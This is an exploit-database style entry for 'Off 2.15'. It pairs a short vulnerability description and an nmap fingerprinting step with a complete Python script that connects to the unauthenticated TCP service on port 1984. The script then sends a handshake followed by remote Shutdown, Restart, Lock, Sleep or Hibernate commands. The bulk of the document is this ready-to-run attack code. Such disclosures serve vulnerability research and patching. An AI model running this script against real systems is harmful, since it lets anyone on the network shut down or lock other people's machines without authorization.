# Exploit Title: Off 2.15 - Unauthenticated Remote System Control
# Date: 25/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.bridgetech.io
# Software Link: https://www.bridgetech.io/OffLinux.zip
# Version: 2.15
# Tested on: Linux 6.1.15

'''
Description:

Off 2.15 exposes a TCP service on 1984 port that allows unauthenticated
attackers to issue remote system control commands such as Shutdown,
Restart, Lock, Sleep, and Hibernate.

Identification:

nmap -sV --version-intensity 0 -T5 -p1984 192.168.8.107

output:
PORT      STATE SERVICE VERSION
1984/tcp open  unknown
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port49746-TCP:V=7.94SVN%I=0%D=6/25%Time=685B86E0%P=x86_64-pc-linux-gnu%
SF:r(NULL,9,"unlocked\n");

should return "unlocked".


'''

#!/usr/bin/env python3

import socket
import argparse
import sys
import json
from time import sleep

def control_pc(ip, port, action):
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((ip, port))


            s.sendall(b"Hello\x0a")
            response = s.recv(1024)
            print(f"[+] Server response: {response.decode().strip()}")


            s.sendall(b'{"messageType":"AccessTokenRequest"}\x0a')

            sleep(1)

            s.sendall((action + "\x0a").encode())
            print(f"[+] Sent command: {action}")

    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("--lock", action="store_true")
    parser.add_argument("--shutdown", action="store_true")
    parser.add_argument("--restart", action="store_true")
    parser.add_argument("--hibernate", action="store_true")
    parser.add_argument("--sleep", action="store_true")
    parser.add_argument("--ip", default="127.0.0.1")
    parser.add_argument("--port", type=int, default=1984)

    args = parser.parse_args()

    actions = {
        "Lock": args.lock,
        "Shutdown": args.shutdown,
        "Restart": args.restart,
        "Hibernate": args.hibernate,
        "Sleep": args.sleep
    }

    selected = [a for a, v in actions.items() if v]

    if len(selected) != 1:
        print("Specify one action")
        sys.exit(1)

    control_pc(args.ip, args.port, selected[0])